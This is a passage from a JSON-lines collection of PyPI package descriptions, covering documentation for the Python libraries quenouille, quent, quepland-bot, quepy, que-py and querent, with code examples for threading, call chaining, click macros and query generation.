So if you decide to add more items afterwards, this is not the function's concern anymore.ThreadPoolExecutorIf you need to runimaporimap_unorderedmultiple times in succession while keeping the same thread pool up and running, you can also directly use quenouille'sThreadPoolExecutorlike so:fromquenouilleimportThreadPoolExecutor# Using it as a context manager:withThreadPoolExecutor(max_workers=4)asexecutor:foriinexecutor.imap(range(10),worker):print(i)forjinexecutor.imap_unordered(range(10),worker):print(j)# Or if you prefer shutting down the executor explicitly:executor=ThreadPoolExecutor()executor.imap(range(10),worker)executor.shutdown(wait=False)Note that your throttling state is kept between multipleimapandimap_unorderedcalls so you don't end up perform some tasks too soon. But keep in mind this state is tied to thekeyfunction you provide to remain consistent, so if you change the usedkey, the throttling state will be reset.Argumentsmax_workers(int, optional): Maximum number of threads to use. Defaults tomin(32, os.cpu_count() + 1). Note that it can be0, in which case no threads will be used and everything will run synchronously (this can be useful for debugging or to avoid duplicating code sometimes).initializer(callable, optional): Function to run at the start of each thread worker. Can be useful to setupthread-local data, for instance. Remember this function must be threadsafe and should not block because the thread pool will wait for each thread to be correctly booted before being able to proceed. If one of the function calls fails, the thread pool will raise aquenouille.exceptions.BrokenThreadPoolerror and terminate immediately.initargs(iterable, optional): Arguments to pass to theinitializerfunction.wait(bool, optional)[True]: Whether to join worker threads, i.e. wait for them to end, when closing the executor. Set this toFalseif you need to go on quickly without waiting for your worker threads to end when cleaning up the executor's resources. Just note that if you spawn other thread-intensive tasks or other executors afterwards in rapid succession, you might start too many threads at once.daemonic(bool, optional)[False]: whether to spawn daemonic worker. If your worker are daemonic, the interpreter will not wait for them to end when exiting. This can be useful, combined towait=False, for instance, if you want your program to exit as soon as hitting ctrl+C (you might want to avoid this if your threads need to cleanup things on exit as they will be abruptly shut down).#.imap, #.imap_unorderedBasically the same as describedherewith the following arguments:iterable(iterable): Any python iterable.func(callable): Function used to perform the desired tasks. The function takes an item yielded by the given iterable as single argument. Note that since this function will be dispatched in worker threads, so you should ensure it is thread-safe.key(callable, optional): Function returning to which \"group\" a given item is supposed to belong. This will be used to ensure maximum parallelism is respected.parallelism(int or callable, optional)[1]: Number of threads allowed to work on a same group at once. 
Can also be a function taking a group and returning its parallelism.buffer_size(int, optional)[1024]: Maximum number of items the function will buffer into memory while attempting to find an item that can be passed to a worker immediately, all while respecting throttling and group parallelism.throttle(int or float or callable, optional): Optional throttle time, in seconds, to wait before processing the next item of a given group. Can also be a function taking last group, item and result and returning next throttle time for this group.block(bool, optional)[False]: Whether to block when using thegetmethod of the given queue.panic(callable, optional): Function that will be called when the process has errored. Useful to unblock some functions and avoid deadlock in specific situations. Note that this function will not be called when synchronous (i.e. when not using additional threads).#.shutdownMethod used to explicitly shutdown the executor.Argumentswait(bool, optional)[True]: Whether to join worker threads, i.e. wait for them to end, when shutting down the executor. Set this toFalseif you need to go on quickly without waiting for your worker threads to end when cleaning up the executor's resources. Just note that if you spawn other thread-intensive tasks or other executors afterwards in rapid succession, you might start too many threads at once.NamedLocksA weakref dictionary of locks useful to make some tasks based on keys threadsafe, e.g. if you need to ensure that two threads will not be writing to the same file at once.fromquenouilleimportNamedLockslocks=NamedLocks()defworker(filename):withlocks[filename]:withopen(filename,'a+')asf:f.write('hello\\n')Miscellaneous notesThe None groupTheimapfunctions consider theNonegroup (this can happen if yourkeyfunction returnsNone) as special and will always consider the attached items can be processed right away without parallelism constraints nor throttle.Withoutkey, all items are considered as belonging to theNonegroup.Parallelism > workersIf you setparallelismto10and only allocate5threads to perform your tasks, it should be obvious that the actual parallelism will never reach10.quenouillewon't warn you of this because it might be convenient not to give this too much thought and has not much consequence, but keep this in mind.Callable parallelism guaranteesIf you decide to pass a function to declare a custom parallelism for each group rather than a global fixed one, know that the function will be called each timequenouillehas to make a decision regarding the next items to enqueue so that we don't use any memory to record the information.This means that you should guarantee that the given function is idempotent and will always return the same parallelism for a given group if you don't want to risk a deadlock.Parallelism vs. throttlingIf a group is being trottled, it should be obvious thatquenouillewon't perform more than one single task for this group at once, so itsparallelismis in fact1, in spite of other settings.This does not mean thatparallelismfor some groups andthrottlefor others is impossible. This can be achieved through callables.Adding entropy to throttleYou can understand the callablethrottlekwarg as \"what's the minimum time the next job from this group should wait before firing up\". 
This means that if you need to add entropy to the throttle time, you can indeed make this function work with randomness like so:fromrandomimportrandom# Waiting 5 + (between 0 and 2) secondsdefthrottle(group,item,result):return5+(2*random())Caveats regarding exception raisingDeferred generator usage exception deadlocksIf you consume a generator returned byimap/imap_unorderedsomewhere else than where you created it, you may end up in a deadlock if you raise an exception.This is not important when usingdaemonic=Truebut you might stumble upon segfaults on exit because of python reasons beyond my control.# Safeforiteminimap(...):raiseRuntimeError# Not safeit=imap(...)foriteminit:raiseRuntimeErrorIf you really want to do that, because you don't want to use theThreadPoolExecutorcontext manager, you can try using the experimentalexcepthookkwarg:# Probably safeit=imap(...,excepthook=True)foriteminit:raiseRuntimeErrorCaveats of using imap with queuesTypical deadlocksEven ifimapcan process an input queue, you should avoid to find yourself in a situation where adding to the queue might block execution if you don't want to end in a deadlock. It can be easy to footgun yourself if your queue has amaxsize, for instance:fromqueueimportQueuefromquenouilleimportimapjob_queue=Queue(maxsize=2)job_queue.put(1)foriinimap(job_queue,worker):ifi<2:job_queue.put(2)job_queue.put(3)# This will put you in a deadlock because this will block# because of the queue `maxsize` set to 2job_queue.put(4)print(i)Design choicesTo enable you to add items to the queue in the loop body and so it can safely detect when your queue is drained without race condition,quenouilleacknowledges that a task is finished only after what you execute in the loop body is done.This means that sometimes it might be more performant to only add items to the queue from the worker functions rather than from the loop body.queue.task_doneFor now,quenouilledoes not callqueue.task_donefor you, so this remains your responsability, if you want to be able to callqueue.joindown the line."} +{"package": "quent", "pacakge-description": "QuentYet Another Chain Interface.Installationpip install quentTable of ContentsIntroductionReal World ExampleDetails & ExamplesLiteral ValuesCustom Arguments (args,kwargs,Ellipsis)Flow ModifiersChain Template / ReuseChain NestingPipe SyntaxSafety CallbacksComparisonsIteratorsContextsAPICoreexcept,finallyConditionalsCascadeDirect Attribute AccessImportant NotesSuggestions and contributions are more than welcome.IntroductionQuent is anenhanced,chain interfaceimplementation for\nPython, designed to handle coroutines transparently. The interface and usage of Quent remains exactly the same,\nwhether you feed it synchronous or asynchronous objects - it can handle almost any use case.Every documented API supports both regular functions and coroutines. It will work the exact same way as with a regular\nfunction. 
Quent automatically awaits any coroutines, even a coroutine that the function passed to.foreach()may\nreturn.Quent is written in C (using Cython) to minimize it's overhead as much as possible.As a basic example, take this function:asyncdefhandle_request(id):data=awaitfetch_data(id)data=validate_data(data)data=normalize_data(data)returnawaitsend_data(data)It uses intermediate variables that only serve to make to code more readable, as opposed to:asyncdefhandle_request(id):returnawaitsend_data(normalize_data(validate_data(awaitfetch_data(id))))With Quent, we can chain these operations:fromquentimportChaindefhandle_request(id):returnChain(fetch_data,id).then(validate_data).then(normalize_data).then(send_data).run()Upon evaluation (calling.run()), if an awaitable object is detected, Quent wraps it in a Task and returns it.\nThe task is automatically scheduled for execution and the chain evaluation continues within the task.\nAs Task objects need not beawait-ed in order to run, you may or may notawaitit, depending on your needs.BesidesChain, Quent provides theCascadeclass which implements thefluent interface.Quent aims to provide all the necessary tools to handle every use case.\nSee the full capabilities of Quent in theAPI Section.Real World ExampleThis snippet is taken from a thin Redis wrapper I wrote, which supports both the sync and async versions\nofrediswithout having a separate implementation for the async version.defflush(self)->Any|Coroutine:\"\"\" Execute the current pipeline and return the results, excludingthe results of inline 'expire' commands.\"\"\"pipe=self.r.pipeline(transaction=self.transaction)# this applies a bunch of Redis operations onto the `pipe` object.self.apply_operations(pipe)return(Chain(pipe.execute,raise_on_error=True).then(self.remove_ignored_commands).finally_(pipe.reset,...).run())Once the chain runs, it will execute the pipeline commands, remove the unwanted results, and return the rest\nof them. Finally, it will reset thepipeobject. Any function passed to.finally_()willalwaysbe invoked,\neven if an exception has been raised during the execution of the chain. The purpose of the...here is explained\nin theEllipsissection.pipe.executeandpipe.resetare both performing a network request to Redis, and in the case of anasyncRedis\nobject - are coroutines and would have to be awaited.\nNotice that I return without an explicitawait- if the user of this wrapper has initialized the class with an\nasyncRedisinstance, they will know that they need toawaitit. This allows me to focus on the actual logic,\nwithout caring aboutsyncvsasync.Some would say that this pattern can cause unexpected behavior, since it isn't clear when it\nwill return a Task or not. 
I see it no differently than any undocumented code - with a proper\nand clear documentation (be it an external documentation or just a simple docstring), there shouldn't be\nany trulyunexpectedbehavior (barring any unknown bugs).Details & ExamplesLiteral ValuesYou don't have to pass a callable as a chain item - literal values works just as well.Chain(fetch_data,id).then(True).run()will executefetch_data(id), and then returnTrue.Custom ArgumentsYou may provideargsorkwargsto a chain item - by doing so, Quent assumes that the item is a callable\nand will evaluate it with the provided arguments, instead of evaluating it with the current value.Chain(fetch_data,id).then(fetch_data,another_id,password=password).run()will executefetch_data(id), and thenfetch_data(another_id, password=password).EllipsisTheEllipsis/...is a special case - if the first argument formostfunctions that register a chain item\nor a callback is...,\nthe item will be evaluated without any arguments.Chain(fetch_data,id).then(do_something,...).run()will executefetch_data(id), and thendo_something().Flow ModifiersWhile the default operation of a chain is to, well, chain operations (using.then()), there are cases where you may\nwant to break out of this flow. For this,Chainprovides the functions.root()and.ignore().\nThey both behave like.then(), but with a small difference:.root()evaluates the item using the root value, instead of the current value..ignore()evaluates the item with the current value but will not propagate its result forwards.There is also a.root_ignore()which is the combination of.root()and.ignore().Reusing A ChainYou may reuse a chain as many times as you wish.chain=Chain(fetch_data,id).then(validate_data).then(normalize_data).then(send_data)chain.run()chain.run()...There are many cases where you may need to apply the same sequence of operations but with different inputs. Take our\nprevious example:Chain(fetch_data,id).then(validate_data).then(normalize_data).then(send_data).run()Instead, we can create a template chain and reuse it, passing different values to.run():handle_data=Chain().then(validate_data).then(normalize_data).then(send_data)foridinlist_of_ids:handle_data.run(fetch_data,id)Re-using aChainobject will significantly reduce its overhead, as most of the performance hit is due\nto the creation of a newChaininstance. Nonetheless, the performance hit is negligible and not worth to sacrifice\nreadability for. So unless it makes sense (or you need to really squeeze out performance),\nit's better to create a newChaininstance.Nesting A ChainYou can nest aChainobject within anotherChainobject:Chain(fetch_data,id).then(Chain().then(validate_data).then(normalize_data)).then(send_data).run()A nested chain must always be a template chain (i.e. 
initialized without arguments).A nested chain will be evaluated with the current value of the parent chain passed to its.run()method.Pipe SyntaxPipe syntax is supported:fromquentimportChain,run(Chain(fetch_data)|process_data|normalize_data|send_data).run()Chain(fetch_data)|process_data|normalize_data|send_data|run()You can also usePipewith Quent:frompipeimportwhereChain(get_items).then(where(lambdaitem:item.is_valid()))Chain(get_items)|where(lambdaitem:item.is_valid())Safety CallbacksThe usage ofexceptandfinallyis supported:Chain(open('')).then(do_something_with_file).finally_(lambdaf:f.close())Read more about it inCallbacks.ComparisonsMost basic comparison operations are supported:Chain(get_key).in_(list_of_keys)# == get_key() in list_of_keysSee the full list of operations inConditionals.IteratorsYou can easily iterate over the result of something:Chain(fetch_keys).foreach(do_something_with_key)The full details of.foreach()are explainedhere.ContextsYou can execute a function (or do quite anything you want) inside a context:Chain(get_lock,id).with_(fetch_data,id)The full details of.with_()are explainedhere.APIValue EvaluationMost of the methods in the following section receivesvalue,args, andkwargs. Unless explicitly told otherwise,\nthe evaluation ofvaluein all of those methods is roughly equivalent to:ifargs[0]isEllipsis:returnvalue()elifargsorkwargs:returnvalue(*args,**kwargs)elifcallable(value):returnvalue(current_value)else:returnvalueTheevaluate_valuefunction contains the full evaluation logic.Core__init__(value: Any = None, *args, **kwargs)Creates a new chain withvalueas the chain's root item.valuecan be anything - a literal value,\na function, a class, etc.\nIfargsorkwargsare provided,valueis assumed to be a callable and will be evaluated with those\narguments. Otherwise, a check is performed to determine whethervalueis a callable. If it is, it is\ncalled without any arguments.Not passing a value will create a template chain (see:Reusing A Chain). 
You can still normally use\nit, but then you must call.run()with a value (see the next section).A few examples:Chain(42)Chain(fn,True)Chain(cls,name='foo')Chain(lambdav:v*10,4.2)run(value: Any = None, *args, **kwargs) -> Any | asyncio.TaskEvaluates the chain and returns the result, or a Task if there are any coroutines in the chain.If the chain is a template chain (initialized without a value), you must call.run()with a value, which will act\nas the root item of the chain.Conversely, if.run()is called with a value and the chain is a non-template chain, then an exception will be raised.\nThe only case where you can both create a template chain and run it without a value is for theCascadeclass,\nwhich is documented below inCascade - Void Mode.Similarly to the examples above,Chain().run(42)Chain().run(fn,True)Chain().run(cls,name='foo')Chain().run(lambdav:v*10,2)then(value: Any, *args, **kwargs) -> ChainAddsvalueto the chain as a chain item.valuecan be anything - a literal value, a function, a class, etc.Returns theevaluationofvalue.This is the main and default way of adding items to the chain.(see:Ellipsisif you need to invokevaluewithout arguments)Chain(fn).then(False)Chain(42).then(verify_result)Chain('').then(uuid.UUID)root(value: Any = None, *args, **kwargs) -> ChainLike.then(), but it first sets the root value as the current value, and then it evaluatesvalueby the defaultevaluation procedure.Calling.root()without a value simply returns the root value.Read more inFlow Modifiers.Chain(42).then(lambdav:v/10).root(lambdav:v==42)ignore(value: Any, *args, **kwargs) -> ChainLike.then(), but keeps the current value unchanged.In other words, this function does not affect the flow of the chain.Read more inFlow Modifiers.Chain(fetch_data,id).ignore(print).then(validate_data)root_ignore(value: Any, *args, **kwargs) -> ChainThe combination of.root()and.ignore().Chain(fetch_data,id).then(validate_data).root_ignore(print).then(normalize_data)attr(name: str) -> ChainLike.then(), but evaluates togetattr(current_value, name).classA:@propertydefa1(self):# I return something importantpassChain(A()).attr('a1')ChainAttr(A()).a1attr_fn(name: str, *args, **kwargs) -> ChainLike.attr(), but evaluates togetattr(current_value, name)(*args, **kwargs).classA:defa1(self,foo=None):# I do something importantpassChain(A()).attr_fn('a1',foo=1)ChainAttr(A()).a1(2)Foreachforeach(fn: Callable) -> ChainIterates over the current value and invokesfn(element)for each element. Returns a list\nthat is the result offn(element)for eachelement.If the iterator implements__aiter__,async for ...will be used.Example:Chain(list_of_ids).foreach(validate_id).run()will iterate overlist_of_ids, and return a list that is equivalent to[validate_id(id) for id in list_of_ids].foreach_do(fn: Callable) -> ChainLike.foreach(), but returns nothing. In other words, this is the combination of.foreach()and.ignore().Example:Chain(list_of_ids).foreach_do(Chain().then(fetch_data).then(validate_data).then(normalize_data).then(send_data)).run()will iterate overlist_of_ids, invoke the nested chain with each differentid, and then returnlist_of_ids.Withwith_(self, value: Any | Callable = None, *args, **kwargs) -> ChainExecuteswith current_value as ctxand evaluatesvalueinside the context block,withctxas the current value, and returns the result. 
Ifvalueis not provided, returnsctx.\nThis method follows thedefault evaluationprocedure, so passingargsorkwargsis perfectly valid.Depending onvalue(andargs/kwargs), this is roughly equivalent towithcurrent_valueasctx:returnvalue(ctx)If the context object implements__aenter__,async with ...will be used.Example:Chain(get_lock,id).with_(fetch_data,id).run()is roughly equivalent to:withget_lock(id)aslock:# `lock` is not used here since we passed a custom argument `id`.returnfetch_data(id)with_do(self, value: Any | Callable, *args, **kwargs) -> ChainLike.with_(), but returns nothing. In other words, this is the combination of.with_()and.ignore().Class MethodsChain.from_(*args) -> ChainCreates aChaintemplate, and registersargsas chain items.Chain.from_(validate_data,normalize_data,send_data).run(fetch_data,id)# is the same as doingChain().then(validate_data).then(normalize_data).then(send_data).run(fetch_data,id)Callbacksexcept_(fn: Callable | str, *args, **kwargs) -> ChainRegister a callback that will be called if an exception is raised anytime during the chain's\nevaluation. The callback is evaluated with the root value, or withargsandkwargsif provided.Iffnis a string, then it is assumed to be an attribute method of the root value.Chain(fetch_data).then(validate_data).except_(discard_data)finally_(fn: Callable | str, *args, **kwargs) -> ChainRegister a callback that willalwaysbe called after the chain's evaluation. The callback is evaluated with\nthe root value, or withargsandkwargsif provided.Iffnis a string, then it is assumed to be an attribute method of the root value.Chain(get_id).then(aqcuire_lock).root(fetch_data).finally_(release_lock)Conditionalsif_(on_true: Any | Callable, *args, **kwargs) -> ChainEvaluates the truthiness of the current value (bool(current_value)).\nIfon_trueis provided and the result isTrue, evaluateson_trueand returns the result.\nIfon_trueis not provided, simply returns the truthiness result (bool).on_truemay be anything and follows the defaultevaluation procedureas described above.Chain(get_random_number).then(lambdan:n>5).if_(you_win,prize=1)else_(on_false: Any | Callable, *args, **kwargs) -> ChainIf a previous conditional result is falsy, evaluateson_falseand returns the result.on_falsemay be anything and follows the defaultevaluation procedureas described above.Can only be called immediately following a conditional.Chain(get_random_number).then(lambdan:n>5).if_(you_win,prize=1).else_(you_lose,cost=10)not_() -> Chainnot current_valueThis method currently does not support theon_trueargument since it looks confusing.\nI might add it in the future.Chain(is_valid,'something').not_()eq(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value == valueChain(420).then(lambdav:v/10).eq(42)Chain(420).then(lambdav:v/10).eq(40).else_(on_fail)neq(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value != valueChain(420).then(lambdav:v/10).neq(40)is_(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value is valueChain(object()).is_(1)is_not(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value is not valueChain(object()).is_not(object())in_(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value in valueChain('sub').in_('subway')not_in(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value not in valueChain('bus').then(lambdas:s[::-1]).not_in('subway')CascadeAlthough considered unpythonic, in some cases 
thecascade designcan be very helpful. TheCascadeclass is identical toChain, except that during the chain's evaluation,\neach chain item is evaluated using the root value as an argument\n(or in other words, the current value is always the chain's root value).\nThe return value ofCascade.run()is always its root value.fromquentimportCascadefetched_data=(Cascade(fetch_data,id).then(send_data_to_backup).then(lambdadata:send_data(data,to_id=1)).then(print).run())will executefetch_data(id), thensend_data_to_backup(data), thensend_data(data, to_id=1),\nand thenprint(data).You can also useCascadeto make existing classes behave the same way:fromquentimportCascadeAttrclassFoo:deffoo(self):...asyncdefbar(self):...defbaz(self):...asyncdefget_foo():f=Foo()f.foo()awaitf.bar()f.baz()returnfdefbetter_get_foo():returnCascadeAttr(Foo()).foo().bar().baz().run()Cascadeworks for any kind of object:fromquentimportCascadeAttrCascadeAttr([]).append(1).append(2).append(3).run()==[1,2,3]Cascade - Void ModeIn some cases it may be desired to run a bunch of independent operations. UsingCascade, one can\nachieve this by simply not passing a root value to the constructor nor to.run(). All the chain items\nwill not receive any arguments (excluding explicitly providedargs/kwargs).await(Cascade().then(foo,False).then(bar).then(baz).run())will executefoo(False), thenbar(), thenbaz().A voidCascadewill always returnNone.Direct Attribute AccessBothChainandCascadecan support \"direct\" attribute access via theChainAttrandCascadeAttrclasses.\nSee theCascadesection above to see an example ofCascadeAttrusage. The same principle holds forChainAttr. Accessing attributes without using theAttrsubclass is possible using.attr()and.attr_fn().The reason I decided to separate this functionality from the main classes is due to the fact\nthat it requires overriding__getattr__, which drastically increases the overhead of both creating an instance and\naccessing any properties / methods. And since I don't think this kind of usage will be common, I decided\nto keep this functionality opt-in.Important NotesAsynchronousexceptandfinallycallbacksIf an except/finally callback is a coroutine function, and an exception is raisedbeforethe first coroutine of the chain has been evaluated, or if there aren't any coroutines in the chain - each\ncallback will be invoked inside a new Task, which you won't have access to.\nThis is due to the fact that we cannot return the new Task(s) from theexcept/finallyclauses.This shouldn't be an issue in most use cases, but important to be aware of.\nARuntimeWarningwill be emitted in such a case.As an example, suppose thatfetch_datais synchronous, andreport_usageis asynchronous.Chain(fetch_data).then(raise_exception,...).finally_(report_usage).run()will executefetch_data(), thenraise_exception(), and thenreport_usage(data). Butreport_usage(data)is a\ncoroutine, andfetch_dataandraise_exceptionsare not. 
Then Quent will wrapreport_usage(data)in a Task\nand \"forget\" about it.If you must, you can \"force\" an async chain by giving it a dummy coroutine:asyncdeffn(v):returnvawaitChain(fetch_data).then(fn).then(raise_exception,...).finally_(report_usage).run()This will ensure thatreport_usage()will be awaited properly."} +{"package": "quente", "pacakge-description": "No description available on PyPI."} +{"package": "quentinrosinski-picsou", "pacakge-description": "No description available on PyPI."} +{"package": "quepland-bot", "pacakge-description": "A simple library for recording and playing mouse macros at regular intervals between clicks.CompatibilityBuilt and tested on Ubuntu 21.04.Installationpip install quepland_botUsageImport and instantiate QueplandBotfrom quepland_bot import QueplandBot\n\n\nbot = QueplandBot()Record clicks: once the method is called, it will wait for a space bar press to begin recording.\nPress any kay to stop recording.bot.record_clicks()Play what you recorded until any key is pressed:bot.run()Changing intervals between clicksWhen instantiating QueplandBot you can define how many seconds it will take between clicks when playing a sequence.\nDefault is 0.1 seconds.bot = Queplandbot(default_seconds_between_clicks=0.5)Saving routinesYou can save a sequence of clicks by assigning the return ofrecord_clicks()to a variable.\nTo play it, pass it as an argument torun().\nWhenrun()is called without arguments it runs last routine recorded.bot = QueplandBot()\n\none_routine = bot.record_clicks()\nother_routine = bot.record_clicks()\n\nbot.run(one_routine)"} +{"package": "quepy", "pacakge-description": "__ _ _ _ ___ _ __ _ _\n / _` | | | |/ _ \\ '_ \\| | | |\n| (_| | |_| | __/ |_) | |_| |\n \\__, |\\__,_|\\___| .__/ \\__, |\n |_| |_| |___/What\u2019s quepy?Quepy is a python framework to transform natural language questions to queries\nin a database query language. It can be easily customized to different kinds of\nquestions in natural language and database queries. 
So, with little coding you\ncan build your own system for natural language access to your database.CurrentlyQuepyprovides support forSparqlandMQLquery languages.\nWe plan to extended it to other database query languages.An exampleTo illustrate what can you do with quepy, we included an example application to\naccessDBpediacontents via theirsparqlendpoint.You can try the example online here:Online demoOr, you can try the example yourself by doing:python examples/dbpedia/main.py \"Who is Tom Cruise?\"And it will output something like this:SELECTDISTINCT?x1WHERE{?x0rdf:typefoaf:Person.?x0rdfs:label\"Tom Cruise\"@en.?x0rdfs:comment?x1.}ThomasCruiseMapotherIV,widelyknownasTomCruise,isan...The transformation from natural language to sparql is done by first using a\nspecial form of regular expressions:person_name=Group(Plus(Pos(\"NNP\")),\"person_name\")regex=Lemma(\"who\")+Lemma(\"be\")+person_name+Question(Pos(\".\"))And then using and a convenient way to express semantic relations:person=IsPerson()+HasKeyword(person_name)definition=DefinitionOf(person)The rest of the transformation is handled automatically by the framework to\nfinally produce this sparql:SELECTDISTINCT?x1WHERE{?x0rdf:typefoaf:Person.?x0rdfs:label\"Tom Cruise\"@en.?x0rdfs:comment?x1.}Using a very similar procedure you could generate and MQL query for the same question\nobtaining:[{\"/common/topic/description\":[{}],\"/type/object/name\":\"Tom Cruise\",\"/type/object/type\":\"/people/person\"}]InstallationYou need to have installednumpy.\nOther than that, you can just type:pip install quepyYou can get more details on the installation here:http://quepy.readthedocs.org/en/latest/installation.htmlLearn moreYou can find a tutorial here:http://quepy.readthedocs.org/en/latest/tutorial.htmlAnd the full documentation here:http://quepy.readthedocs.org/Join ourmailing listContribute!Want to help develop quepy? Welcome aboard! Find us in#quepy at freenodequepydev at librelist.com"} +{"package": "que-py", "pacakge-description": "Que: SQL for Sneks \ud83d\udc0dQue allows you to get generate your SQL queries on the fly, without the\noverhead of a fully-fledged ORM.MotivationsQue was born out of a need for dynamically generated SQL for an ASGI web\nservice. I found my self wishing for the convenience of dynamic querying\nwith an ORM such as SQLAlchemy, but the performance of a fully\nasynchronous database client. Que attempts to fill this void. Choose the\nconnection client you prefer and let Que worry about the SQL.What Is It?Que looks to solve a single purpose: generate SQL-compliant queries in\npure-Python. Que has absolutely no hard dependendencies and does not\nenforce the use of a specific database client or dialect.Still want to use SQLAlchemy for your connection? Go for it. Want to use\nPyMySQL or psycopg2? Que won't stop you. Want to use an asyncio\nframework such as aiopg? You have excellent taste! 
This library was\nwritten just for you.DesignThe focus of Que issimplicity, just look at what it takes for a\nsimpleSELECT:>>>importque>>>select=que.Select(table='foo')>>>selectSelect(table='foo',schema=None,filters=FilterList([]),fields=FieldList([]))>>>sql,args=select.to_sql()>>>print(sql)SELECT*FROMfooQue works with the DBAPI client of your choice by parametrizing your sql\nand formatting your arguments for you:>>>importque>>>fields=[que.Field('bar')]>>>filters=[que.Filter(que.Field('id',1))]>>>select=que.Select(table='foo',filters=filters,fields=fields)>>>sql,args=select.to_sql()>>>print(sql)SELECTbarFROMfooWHEREid=:1>>>args[1]>>>sql,args=select.to_sql(style=que.NameParamStyle.NAME)>>>print(sql)SELECTbarFROMfooWHEREid=:id>>>args{'id':1}Que works to normalize the API for your SQL operations, so that\ninitializing anINSERTorUPDATEis functionally the same as\ninitializing aSELECT:>>>importque>>>importdataclasses>>>importdatetime>>>>>>@dataclasses.dataclass...classFoo:...bar:str...id:int=None...created:datetime.datetime=None...>>>new_foo=Foo('blah')>>>fields=que.data_to_fields(new_foo,exclude=None)>>>insert=que.Insert(table='foo',fields=fields)>>>sql,args=insert.to_sql(que.NameParamStyle.NAME)>>>print(sql)INSERTINTOfoo(:colbar)VALUES(:valbar)>>>args{'colbar':'bar','valbar':'blah'}QuickStartQue has no dependencies and is exceptionally light-weight (currently\nonly ~30Kb!), comprising of only a few hundred lines of code.\nInstallation is as simple aspip3 install que-py.Then you're good to go!import queand rock on \ud83e\udd18ExamplesA simple client for generating your SQL and inserting new entries:importdataclassesimportsqlite3importque@dataclasses.dataclassclassSpam:flavor:strid:int=Nonecreated_on:int=NoneclassSpamClient:\"\"\"A database client for tracking spam flavors.\"\"\"def__init__(self):self.conn=sqlite3.connect('sqlite://spam.db')definsert_spam(self,spam:Spam):fields=que.data_to_fields(spam,exclude=None)insert=que.Insert('spam',fields=fields)sql,args=insert.to_sql()returnself.conn.execute(sql,args)defget_spam(self,**kwargs):fields=que.data_to_fields(kwargs)filters=[que.Filter(x)forxinfields]select=que.Select('spam',filters=filters)returnself.conn.execute(*select.to_sql())defupdate_spam(self,spam:Spam):fields=[que.Field('flavor',spam.flavor)]filters=[que.Filter(que.Field('id',spam.id))]update=que.Update('spam',filters=filters,fields=fields)returnself.conn.execute(*update.to_sql())defdelete_spam(self,spam:Spam):filters=[que.Filter(que.Field('id',spam.id))]delete=que.Delete('spam',filters=filters)returnself.conn.execute(*delete.to_sql())DocumentationFull documentation coming soon!Happy Querying \ud83d\udc0dHow to ContributeCheck for open issues or open a fresh issue to start a discussion\naround a feature idea or a bug.Create a branch on Github for your issue or forkthe repositoryon GitHub to\nstart making your changes to themasterbranch.Write a test which shows that the bug was fixed or that the feature\nworks as expected.Send a pull request and bug the maintainer until it gets merged and\npublished. :)"} +{"package": "quera", "pacakge-description": "No description available on PyPI."} +{"package": "quera-ahs-utils", "pacakge-description": "quera-ahs-utilsThis python package is a collection of tools that can be used to program QuEra'sneutral atom Analog Hamiltonian Simulator(ahs). These tools are primarily targeted towards the usage ofAmazon's Braket quantum computing service. 
The Braket Python SDK can be foundherealong with some examples of how to use their service through a collection of examples from bothBraketandQuEra.Some of the source code contained in this package originates fromthismodule which was co-authered by the Braket science team.We would be remiss not to advertise our ownJuliaSDK for programming QuEra'sahs,Bloqadeas well as modeling neutral atom quantum computing.InstallationThe package can be installed viapip:pip install quera-ahs-utilsPackage contentsquera-ahs-utilsis broken up into 5 modules each dealing with specific tools summarized in the table below:moduledescriptionquera_ahs_utils.analysisPerform analysis on shot resultsquera_ahs_utils.driveEasily generate different types of driving hamiltoniansquera_ahs_utils.irTransform between QuEra and Braket program representationsquera_ahs_utils.parallelizeTransform small jobs into a parallel set of jobs to maximize the field of view of the QPUquera_ahs_utils.plottingVisualize bothahsprograms as well as its results.A module reference can be foundhere"} +{"package": "querent", "pacakge-description": "QuerentThe Asynchronous Data Dynamo and Graph Neural Network CatalystUnlock Insights, Asynchronous Scaling, and Forge a Knowledge-Driven Future\ud83d\ude80Async at its Core: Querent thrives in an asynchronous world. With asynchronous processing, we handle multiple data sources seamlessly, eliminating bottlenecks for utmost efficiency.\ud83d\udca1Knowledge Graphs Made Easy: Constructing intricate knowledge graphs is a breeze. Querent's robust architecture simplifies building comprehensive knowledge graphs, enabling you to uncover hidden data relationships.\ud83c\udf10Scalability Redefined: Scaling your data operations is effortless with Querent. We scale horizontally, empowering you to process multiple data streams without breaking a sweat.\ud83d\udd2cGNN Integration: Querent seamlessly integrates with Graph Neural Networks (GNNs), enabling advanced data analysis, recommendation systems, and predictive modeling.\ud83d\udd0dData-Driven Insights: Dive deep into data-driven insights with Querent's tools. Extract actionable information and make data-informed decisions with ease.\ud83e\udde0Leverage Language Models: Utilize state-of-the-art language models (LLMs) for text data. Querent empowers natural language processing, tackling complex text-based tasks.\ud83d\udcc8Efficient Memory Usage: Querent is mindful of memory constraints. Our framework uses memory-efficient techniques, ensuring you can handle large datasets economically.Table of ContentsQuerentUnlock Insights, Asynchronous Scaling, and Forge a Knowledge-Driven FutureTable of ContentsIntroductionFeaturesGetting StartedPrerequisitesInstallationUsageConfigurationQuerent: an asynchronous engine for LLMsEase of UseContributingLicenseIntroductionQuerent is designed to simplify and optimize data collection and processing workflows. 
Whether you need to scrape web data, ingest files, preprocess text, or create complex knowledge graphs, Querent offers a flexible framework for building and scaling these processes.FeaturesCollectors:Gather data from various sources asynchronously, including web scraping and file collection.Ingestors:Process collected data efficiently with custom transformations and filtering.Processors:Apply asynchronous data processing, including text preprocessing, cleaning, and feature extraction.Storage:Store processed data in various storage systems, such as databases or cloud storage.Workflow Management:Efficiently manage and scale data workflows with task orchestration.Scalability:Querent is designed to scale horizontally, handling large volumes of data with ease.Getting StartedLet's get Querent up and running on your local machine.PrerequisitesPython 3.9+Virtual environment (optional but recommended)InstallationCreate a virtual environment (recommended):python-mvenvvenvsourcevenv/bin/activate# On Windows, use `venv\\Scripts\\activate`Install latest Querent Workflow Orchestrator package:pipinstallquerentInstall the project dependencies:python3-mspacydownloaden_core_web_lgUsageQuerent provides a flexible framework that adapts to your specific data collection and processing needs. Here's how to get started:Configuration:Set up collector, ingestor, and processor configurations as 